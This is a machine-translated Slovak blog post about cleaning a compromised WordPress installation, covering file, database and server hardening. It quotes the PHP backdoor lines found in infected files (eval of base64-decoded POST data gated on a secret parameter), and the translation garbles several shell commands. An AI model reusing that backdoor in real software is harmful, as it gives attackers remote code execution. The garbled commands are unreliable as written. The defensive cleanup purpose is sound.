WordPress Exploit - čistenie ohrozená súbory a zabezpečenie SQL Server.

Než budete čítať tento príspevok, mali by ste vidieť , Ak chcete niečo pochopiť. :)

Zistili sme, v niekoľkých blogov na súbory stealthsettings.com, podobný kódu pod virusarii vznikajú WordPress využiť.:

<? Php if ($ _ GET [ '573abcb060974771'] == "8e96d1b4b674e1d2") {eval (base64_decode ($ _ POST [ 'file'])); exit; }?>

si

<?php if($_COOKIE[’44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST[‘file’])); exit; } ?>

xmlrpcAk je to uvedený súbor xmlrpc.php z ospalýAle v grep server, môžete vidieť, že existuje pomerne málo svojho druhu v zdrojovom kóde.

pppffiuuu

Čistenie infikovaných súborov:

Ooookkkk ...
1. Najlepším riešením, po tom, čo zálohovanieA vyčistiť databáze je utrieť súbory WordPress (Wp-config.php môže udržať súbory nie sú striktne súvisiace s WP platformu, po starostlivo kontrolované) na serveri a to nahrať pôvodnú verziu 2.5.1 (Počas tohto prevedenia WP verzia upgradu :)) http://wordpress.org/download/ . Utrite vrátane tematických súborov, ak nechcete veriť, že ich starostlivú kontrolu.

Zdá sa, že boli postihnuté a súbory tém, ktoré neboli použité predtým na blogu a jednoducho zmeniť tému, nerieši problém.

./andreea/wp-content/themes/default/index.php:<?php if ($ _ COOKIE ['44e827f9fbeca184'] == '5cd3c94b4b1c57ea ") {eval (base64_decode ($ _ POST [' file '])); exit; ?}> <? Php get_header (); ?>

2. Vyhľadávanie a zmažte všetky súbory, ktoré obsahujú: * _new.php, * _old.php, * Jpgg, * GIFF, * Pngg a súbor wp-info.txt, ak existuje ....

Nájsť. -Meno "* _new.php"
Nájsť. -Meno "* _old.php"
Nájsť. -Meno "*. Jpgg"
Nájsť. -Meno "* _giff"
Nájsť. -Meno "* _pngg"
Nájsť. -Name "wp-info.txt"

3. v / Tmp , Vyhľadávanie a mazanie zložiek, ako je tmpYwbzT2

SQL odevov :

1. v tabuľke tabuľke wp_options zistiť, či tam je vymazať riadky: internal_links_cache, rss_f541b3abd05e7962fcab37737f40fad8 si wordpress_options.

2. Aj v wp_options, prejdite na active_plugins a mazať, ak je plugin, ktorý skončí v jednom z rozšírenia * _new.php, * _old.php, *. jpgg, *. GIFF, *. pngg alebo ak ďalšie rozšírenie je podozrenie, starostlivo skontrolujte.

3. V tabuľke wp_users, Pozrite sa, či je používateľ, ktorý nemá nič nenapísal vo svojom práve, stĺpec user_nicename. Odstrániť túto užívateľa, ale všimnite si číslo na stĺpec ID. Tento užívateľ môže použiť "WordPress" ako user_login a zdá sa byť vytvorený na 00: 00: 00 0000-00-00.

4. Prejsť na tabuľky wp_usermeta a odstrániť všetky riadky patriace ID vyššie.

Potom, čo ste urobil tento sql čistenie, zakázať a povoliť niektoré plugin. (V blogu -> Dashboard -> Plugins)

Zabezpečený server:

1. Pozrite sa, čo adresáre a súbory sú "zapisovateľný"(Chmod 777) a pokúsiť sa dať na ne v chmod že by nedovolil ich písanie na akejkoľvek úrovni. (644 chmod, napríklad)

Nájsť. -Perm-2-ls

2. Pozrite sa, čo súbory majú nastavený bit suid alebo sgid . Ak nechcete použiť tie súbory, ktoré na ne chmod 0 alebo odinštalovať balíček, ktorý obsahuje. Sú veľmi nebezpečné, pretože oprávnenie EXECUTE "skupina"Alebo"koreň"A nie s normálnymi užívateľskými privilégiami na vykonanie tohto súboru.

find /-type f-perm-04000-ls
find /-type f-perm-02000-ls

3. Skontrolujte, ktoré porty sú otvorené a pokúsiť sa uzavrieť alebo zabezpečiť tie, ktoré nie sú používané.

netstat-| grep-i počúvať

O tom. Vidím Google Search a iní hovoria, "No, že si!". No dobrá, čo ste urobil ... ale čo keď satelitné začne zakázať všetky weby formujúce IS SPAM a dal trójske kone (Trojan.Clicker.HTML) V pečivo?

WordPress Exploit - čistenie ohrozená súbory a zabezpečenie SQL Server.

O autorovi

tajnosť

Vášnivý o všetkom, čo znamená gadget a IT, píšem s potešením na stealthsettings.com od 2006 a rád s vami objavujem nové veci o počítačoch a MacOS, operačných systémoch Linux, Windows, iOS a Android.

Pridať komentár

Zanechať odpoveď Tu som zmenil tému | Jeho ničota Krümel X